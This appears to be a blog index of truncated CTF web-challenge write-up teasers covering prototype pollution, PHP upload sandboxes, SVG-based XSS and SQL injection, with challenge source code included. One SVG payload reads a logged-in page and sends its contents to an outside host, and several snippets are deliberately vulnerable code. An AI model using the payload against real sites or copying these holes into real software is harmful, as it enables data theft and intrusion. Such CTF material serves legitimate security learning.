RCE-As-A-Service (RAAS) This challenge was a web app with ports 5000 and 22 open. On port 5000 runs a web app called AdminCrashBoard, written in Flask. User management is done with PAM, so registering a user creates a Linux user on the system. SSH is running on port 22. The web app allows registered and logged-in users to upload so-called buttons that can be executed on the server. Example button: ...
Description Your car broke down?! Come to our shop, we repair all cars! Even very old ones. Enter the Shop Challenge Source New GitHub demo Solution Car Repair Shop is a classic XSS challenge I created for the Hack.lu 2019 CTF. Looking at the static HTML code, you find jQuery and two custom scripts. One defines a Car class: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 class Car { constructor(type, model, color, pic, key="") { this.type = type this.model = model this.color = color this.key = key this.pic = pic let started = false this.start = () => { started = true } this.isStarted = () => { return started } } powerOn() { if (this.isStarted()) { infobox(`Well Done!`) nextCar() } else { $('.chargeup')[0].play() } } info() { infobox(`This car is a ${this.type} ${this.model} in ${this.color}. It looks very nice! But it seems to be broken ...`) } repair() { if(urlParams.has('repair')) { $.extend(true, this, JSON.parse(urlParams.get('repair'))) } } light() { infobox(`You turn on the lights ... Nothing happens.`) } battery() { infobox(`Hmmm, the battery is almost empty ... Maybe i can repair this somehow.`) } ignition() { if (this.key == "") { infobox(`Looks like the key got lost. No wonder the car is not starting ...`) } if (this.key == "🔑") { infobox(`The car started!`) this.start() } } } In the challenge, you are supposed to fix the cars and, in the end, get JavaScript execution. After analyzing the code, you find that you can call jQuery extend with your input. The jQuery version used in this challenge is still vulnerable to Prototype Pollution. With it, you can set the key and bypass the MD5 check for the second car: toString will return lol because the object inherits from the Array class now and toString returns the value of the first element. ...
Description Piggy-Bank CTFZONE 2018 Web Challenge [100] Hack some bank for me. http://web-05.v7frkwrfyhsjtbpfcppnu.ctfz.one/ This is just a quick and dirty write-up. First, we created an account, logged in, and looked for interesting stuff. There was a VIP section: “This section is available only to privileged pigs with money in pockets. Transfer to the piggy-bank 1 000 000 coins and become important.” So we assumed this is what we had to do. For that, we needed more money, so we assumed that there was a bug in the transfer page. ...
Description automatic_door Seccon2017 [500] Get shell, and execute /flag_x http://automatic_door.pwn.seccon.jp/0b503d0caf712352fc200bc5332c4f95/ Skip Code 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 <?php $fail = str_repeat('fail', 100); $d = 'sandbox/FAIL_' . sha1($_SERVER['REMOTE_ADDR'] . '95aca804b832f4c329d8c0e7c789b02b') . '/'; @mkdir($d); function read_ok($f) { return strstr($f, 'FAIL_') === FALSE && strstr($f, '/proc/') === FALSE && strstr($f, '/dev/') === FALSE; } function write_ok($f) { return strstr($f, '..') === FALSE && read_ok($f); } function GetDirectorySize($path) { $bytestotal = 0; $path = realpath($path); if ($path !== false && $path != '' && file_exists($path)) { foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS)) as $object) { $bytestotal += $object->getSize(); } } return $bytestotal; } if (isset($_GET['action'])) { if ($_GET['action'] == 'pwd') { echo $d; exit; } else if ($_GET['action'] == 'phpinfo') { phpinfo(); exit; } else if ($_GET['action'] == 'read') { $f = $_GET['filename']; if (read_ok($f)) echo file_get_contents($d . $f); else echo $fail; exit; } else if ($_GET['action'] == 'write') { $f = $_GET['filename']; if (write_ok($f) && strstr($f, 'ph') === FALSE && $_FILES['file']['size'] < 10000) { print_r($_FILES['file']); print_r(move_uploaded_file($_FILES['file']['tmp_name'], $d . $f)); } else echo $fail; if (GetDirectorySize($d) > 10000) { rmdir($d); } exit; } else if ($_GET['action'] == 'delete') { $f = $_GET['filename']; if (write_ok($f)) print_r(unlink($d . $f)); else echo $fail; exit; } } highlight_file(__FILE__); Solution First, we see that there are different actions (pwd, phpinfo, read, write and delete). I checked the phpinfo page first to get some more information. ...
Very quick little write-up: Get a friend account using XSS in SVG: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> var xhr = new XMLHttpRequest(); xhr.open('GET','/home.php?email_address_of_tsu_friend=m@m.de'); xhr.onload = function () { var myImage = new Image(100, 200); myImage.src ='http://example.com:81/'+btoa(xhr.responseText); }; xhr.send(null); </script> </svg> Now you can upload a small file (20 characters) without any blacklisted keywords (system, exec, `, …) or blacklisted endings (php, .ht*, …). We noticed the header X-Powered-By: PHP-fpm/5.6, so we uploaded a .user.ini file. This is a configuration INI file that works on a per-directory basis. ...
On the contacts page, we were able to send links to the admin bot, which it would then visit, and we assumed we had to steal credentials to get into the admin.php page. After we were unable to steal any cookies or find XSS on the site, we used nmap to scan the host. It showed that both 80 and 8080 were open; later a hint was released that there was a difference between them. ...
This was a three-stage SQLi challenge we solved during the MeePwn CTF. Shout-out to Sceptic, who solved the first stage and told me to look at the next one. Br0kenMySQL 100 pts BabeTrick 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 <title>Br0kenMySQL</title><h1><pre> <p style='color:Red'>Br0kenMySQL</p> <?php if($_GET['debug']=='🕵') die(highlight_file(__FILE__)); require 'config.php'; $link = mysqli_connect('localhost', MYSQL_USER, MYSQL_PASSWORD); if (!$link) { die('Could not connect: ' . mysql_error()); } if (!mysqli_select_db($link,MYSQL_USER)) { die('Could not select database: ' . mysql_error()); } $id = $_GET['id']; if(preg_match('#sleep|benchmark|floor|rand|count#is',$id)) die('Don\'t hurt me :-('); $query = mysqli_query($link,"SELECT username FROM users WHERE id = ". $id); $row = mysqli_fetch_array($query); $username = $row['username']; if($username === 'guest'){ $ip = @$_SERVER['HTTP_X_FORWARDED_FOR']!="" ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if(preg_match('#sleep|benchmark|floor|rand|count#is',$ip)) die('Don\'t hurt me :-('); var_dump($ip); if(!empty($ip)) mysqli_query($link,"INSERT INTO logs VALUES('{$ip}')"); $query = mysqli_query($link,"SELECT username FROM users WHERE id = ". $id); $row = mysqli_fetch_array($query); $username = $row['username']; if($username === 'admin'){ echo "What ???????\nLogin as guest&admin at the same time ?\nSeems our code is broken, here is your bounty\n"; die(FLAG); } echo "Nothing here"; } else { echo "Hello ".$username; } ?> As you can see, we want the first query to return guest and the second query to return admin. The admin ID was 1 and the guest ID was 2, and between the queries there was another injection point in an INSERT query. For all injections we had to bypass the following filter: ...
Challenge description: Professor M. Eista Hax uses a digital tool to manage all his students. He is very happy with the system, but it does have one drawback: it does not support multiple users. This is a problem, because M. Eista Hax has employees who need access as well. To solve this he writes a super modern, highly encrypted web application to share the password with authorized users. Problem solved. ...